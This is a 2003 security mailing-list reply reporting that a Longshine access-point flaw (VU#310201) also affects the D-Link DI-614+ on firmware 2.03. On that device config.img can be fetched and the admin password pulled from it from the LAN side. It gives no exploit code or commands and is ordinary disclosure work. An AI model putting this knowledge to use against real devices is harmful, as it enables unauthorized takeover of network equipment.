Re: Longshine WLAN Access-Point LCS-883R VU#310201

From: heydownsat_private
Date: Mon Jan 06 2003 - 10:57:52 PST

    This vulnerability is also an issue on the popular DLink DI-614+ (which I
    think is based upon the Longshine product).  I was able to grab config.img
    and also extract the "admin" password from it. This was confirmed with
    firmware version 2.03 dated 9/10/2002.

    On the DLink product, you can only perform this from the "LAN-side" of the
    device in the default configuration.

    DLink has version 2.10 available, dated 11/25/2002, but I have not tried
    it yet.

    	-Jeff